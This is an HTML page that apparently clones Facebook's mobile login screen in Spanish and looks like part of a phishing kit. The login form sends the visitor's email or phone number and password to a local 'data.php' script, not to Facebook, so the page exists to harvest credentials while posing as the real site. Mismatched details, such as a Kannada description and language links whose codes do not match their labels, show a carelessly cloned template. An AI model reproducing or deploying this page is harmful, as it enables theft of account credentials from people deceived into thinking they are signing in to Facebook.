<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <title>Facebook - Entrar o registrarse</title>
  <meta content="default" id="meta_referrer" name="referrer"/>
  <style type="text/css">
   /*<![CDATA[*/.b .bw{display:block;width:auto;}.b .bw .bx,.b .bw .bx:hover{background-color:#42b72a;color:#fff;height:44px;}.b .br{display:block;margin-bottom:5px;margin-left:3%;margin-top:-3px;overflow:hidden;text-align:center;white-space:nowrap;width:94%;}.b .br>span{display:inline-block;position:relative;}.b .br>span:before,.b .br>span:after{background:#ced0d4;content:"";height:1px;position:absolute;top:50%;width:9999px;}.b .br>span:before{margin-right:15px;right:100%;}.b .br>span:after{left:100%;margin-left:15px;}.b .bs{color:#4b4f56;font-size:14px;}.w{padding:8px;}.ca{padding-bottom:12px;padding-top:12px;}.bz{padding-left:4px;padding-right:4px;}.bu{padding-left:8px;padding-right:8px;}.b .bl{border:solid 1px #999;box-sizing:border-box;width:100%;}.b .t{border:0;border-collapse:collapse;margin:0;padding:0;width:100%;}.b .t tbody{vertical-align:top;}.b .t td{padding:0;}.b .t td.bf{padding:4px;}.b .u{width:100%;}.v{background:#fa3e3e;}.x{color:#fff;}.b .x a,.b .x a:visited{color:#fff;font-weight:bold;}.b .x a:focus,.b .x a:hover{background:#1d2129;}.cc{color:#4b4f56;}.y{font-size:12px;line-height:16px;}.cb{font-size:16px;line-height:20px;}.q{font-weight:normal;}.bh{font-weight:bold;}.bt{text-align:center;}form{margin:0;border:0;}.be{margin:0;}.be li{display:block;list-style:none;}.b .cd{padding:0;}.b .bf{padding:4px;}.b .bi{color:#90949c;display:block;font-weight:bold;}.b .bk{padding:12px 8px;color:#1d2129;}.bj{border:0;display:block;margin:0;padding:0;}.bm{box-sizing:border-box;width:100%;}.b .bn{border:solid 1px #999;}.m{appearance:none;background:none;display:inline-block;font-size:12px;height:28px;line-height:28px;margin:0;overflow:visible;padding:0 9px;text-align:center;vertical-align:top;white-space:nowrap;}.b .m{border-radius:2px;}.by,a.by,.b a.by,.b a.by:visited{background-color:#f6f7f9;color:#4b4f56;}.b a.by:hover,.b .by:hover{background-color:#e9ebee;color:#4b4f56;}.b .by{border:1px solid #bec2c9;}.by[disabled]{color:#bec2c9;}.b .by[disabled]:hover{background-color:#f6f7f9;color:#bec2c9;}.bq,.p,a.bq,a.p,html .b a.bq,html .b a.p{color:#fff;}.b .p{background-color:#4080ff;border:1px solid #4476e8;}.b a.p:hover,.b .p:hover{background-color:#4580ef;}.b .bq{background-color:#4267b2;border:1px solid #365899;}.b a.bq:hover,.b .bq:hover{background-color:#465e91;}.bq[disabled]{color:#899bc1;}.p[disabled]{color:#91b4fd;}.b .bq[disabled]:hover{background-color:#4267b2;}.b .p[disabled]:hover{background-color:#4080ff;}.bp{font-size:14px;height:44px;line-height:44px;padding:0 20px;}.m .s{display:inline-block;}.b .m .s{display:inline-block;margin-top:0;vertical-align:middle;}.b a.m::after{content:"";display:inline-block;height:100%;vertical-align:middle;}.m .s{line-height:20px;margin-top:4px;}.bp .s{line-height:24px;margin-top:10px;}.m.bo{display:block;width:100%;}a.m.bo,.b label.m.bo{display:block;width:auto;}.b .m{padding:0 8px;}.b a.m{height:26px;line-height:26px;}.b .bp{padding:0 19px;}.b a.bp{font-size:14px;height:42px;line-height:42px;}.s{pointer-events:none;}.b a,.b a:visited{color:#3b5998;text-decoration:none;}.b a:focus,.b a:hover{background-color:#3b5998;color:#fff;}body{text-align:left;direction:ltr;}body,tr,input,textarea,button{font-family:sans-serif;}body,p,figure,h1,h2,h3,h4,h5,h6,ul,ol,li,dl,dd,dt{margin:0;padding:0;}h1,h2,h3,h4,h5,h6{font-size:1em;font-weight:bold;}ul,ol{list-style:none;}article,aside,figcaption,figure,footer,header,nav,section{display:block;}.e{background-color:#fff;}.g{background-color:#3b5998;}.z{background-color:#eceff5;}#page{position:relative;}.b .n span{font-size:14px;}.b a.o,.b a.o:hover{background-color:#69a74e;color:#fff;}.h{padding:2px 3px;}.i{width:100%;}.i .k{text-align:right;}.ci{display:block;font-size:x-small;margin:-3px -3px 1px -3px;padding:3px;}.ck{border:1px solid #90949c;display:block;font-size:x-large;height:20px;line-height:18px;text-align:center;vertical-align:middle;width:20px;}.b .cf input,.b .cf input:visited,.b .cf a,.b .cf a:visited{color:#bec2c9;}.b .cf input:focus,.b .cf input:hover,.b .cf a:focus,.b .cf a:hover{background:#dddfe2;color:#1d2129;}.ce{background-color:#4b4f56;font-size:x-small;padding:7px 8px 8px;}.ch{color:#bec2c9;display:block;font-size:x-small;margin:-3px -3px 1px -3px;padding:3px;}.cl{color:#fff;}body,tr,input,textarea,.f{font-size:medium;}.j{border:0;display:inline-block;vertical-align:top;}i.j u{position:absolute;width:0;height:0;overflow:hidden;}/*]]>*/
  </style>
  <meta content="ಖಾತೆಯನ್ನು ರಚಿಸಿ ಅಥವಾ Facebook ಗೆ ಲಾಗಿನ್ ಆಗಿ. ಸ್ನೇಹಿತರು, ಕುಟುಂಬ ಮತ್ತು ನಿಮಗೆ ತಿಳಿದಿರುವ ಇತರ ಜನರೊಂದಿಗೆ ಸಂಪರ್ಕದಲ್ಲಿರಿ. ಫೋಟೋಗಳು ಮತ್ತು ವೀಡಿಯೊಗಳನ್ನು ಹಂಚಿಕೊಳ್ಳಿ,..." name="description"/>
  <link href="https://www.facebook.com/" rel="canonical"/>
 </head>
 <body class="b c d e" tabindex="0">
  <div class="f">
   <div id="viewport">
    <div class="g h" id="header">
     <table cellpadding="0" cellspacing="0" class="i">
      <tr>
       <td valign="middle">
        <h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">
         Facebook
        </h1>
        <img src="dF5SId3UHWd.svg" width="112" class="img" alt="facebook">
       </td>
       <td class="k" valign="middle">
        <a class="l m n o p q" href="/reg/?cid=102&amp;refid=8">
         <span class="s">
          Crear cuenta nueva
         </span>
        </a>
       </td>
      </tr>
     </table>
    </div>
    <div id="objects_container">
     <div class="e" id="root">
      <table class="t">
       <tbody>
        <tr>
         <td class="u">
          <div class="v w x" style="display: none;">
           <div class="y">
           </div>
          </div>
          <div class="z ba">
           <div>
           </div>
           <div class="bb">
            <form action="data.php" class="bc bd" id="login_form" method="post" novalidate="1">
             <input autocomplete="off" name="lsd" type="hidden" value="AVoVFBN7"/>
             <input name="m_ts" type="hidden" value="1530259479"/>
             <input name="li" type="hidden" value="F-g1W_DPRqc-eGjsczO-78Ik"/>
             <input name="try_number" type="hidden" value="0"/>
             <input name="unrecognized_tries" type="hidden" value="0"/>
             <ul class="be bf bg">
              <li class="bf">
               <span class="bh bi" id="u_0_0">
                N&#xfa;mero de m&#xf3;vil o correo electr&#xf3;nico
               </span>
               <input autocapitalize="off" autocomplete="on" autocorrect="off" class="bj bk bl" id="m_login_email" name="email" type="text"/>
              </li>
              <li class="bf">
               <div>
                <span class="bh bi" id="u_0_1">
                 Contraseña
                </span>
                <input autocapitalize="off" autocomplete="on" autocorrect="off" class="bj bk bm bn" name="pass" type="password"/>
               </div>
              </li>
              <li class="bf">
               <input class="l q m bo bp bq" name="login" type="submit" value="Entrar"/>
              </li>
             </ul>
             <div>
              <div class="br">
               <span class="bs">
                o
               </span>
              </div>
              <div class="bt bu">
               <div class="bt bv bw" id="signup-button">
                <input class="l q m bx bp by" name="sign_up" type="submit" value="Crear cuenta nueva"/>
               </div>
              </div>
             </div>
             <div>
             </div>
             <noscript>
              <input name="_fb_noscript" type="hidden" value="true"/>
             </noscript>
            </form>
            <div class="bz ca">
             <span class="cb cc">
              <ul class="be cd">
               <li class="bf">
                <a href="/recover/initiate/?c=https%3A%2F%2Fm.facebook.com%2F&amp;ars=facebook_login&amp;lwv=100&amp;refid=8" id="forgot-password-link">
                 ¿Has olvidado la contraseña?
                </a>
               </li>
               <li class="bf">
                <a href="/help/?refid=8" id="help-link">
                 Centro de ayuda
                </a>
               </li>
               <li class="bf">
               </li>
              </ul>
             </span>
            </div>
           </div>
           <div>
           </div>
          </div>
         </td>
        </tr>
       </tbody>
      </table>
      <div>
      </div>
      <img height="0" src="https://facebook.com/security/hsts-pixel.gif?c=3.2" style="display:none" width="0"/>
     </div>
    </div>
    <div>
     <div class="ce">
      <div class="cf">
       <table class="t">
        <tbody>
         <tr>
          <td class="u cg" style="width:50%">
           <b class="ch">
            Español (España)
           </b>
           <a class="ci" href="/a/language.php?l=mr_IN&amp;lref=https%3A%2F%2Fm.facebook.com%2F&amp;index=2&amp;gfid=AQARz0LWz-eLxhLF&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8">
            Português (Brasil)
           </a>
           <a class="ci" href="/a/language.php?l=en_GB&amp;lref=https%3A%2F%2Fm.facebook.com%2F&amp;index=4&amp;gfid=AQCiUHFolaC6pEz_&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8">
            Français (France)
           </a>
          </td>
          <td class="u cj" style="width:50%">
           <a class="ci" href="/a/language.php?l=ur_PK&amp;lref=https%3A%2F%2Fm.facebook.com%2F&amp;index=1&amp;gfid=AQBFoyFv0VORCUDB&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8">
            English (US)
           </a>
           <a class="ci" href="/a/language.php?l=te_IN&amp;lref=https%3A%2F%2Fm.facebook.com%2F&amp;index=3&amp;gfid=AQA21rgVzQ98Twux&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8">
            Italiano
           </a>
           <a class="ci" href="/language.php?n=https%3A%2F%2Fm.facebook.com%2F&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8">
            <div class="ck">
             +
            </div>
           </a>
          </td>
         </tr>
        </tbody>
       </table>
      </div>
      <span class="bh cl">
       Facebook, Inc.
      </span>
     </div>
    </div>
   </div>
  </div>
 </body>
</html>
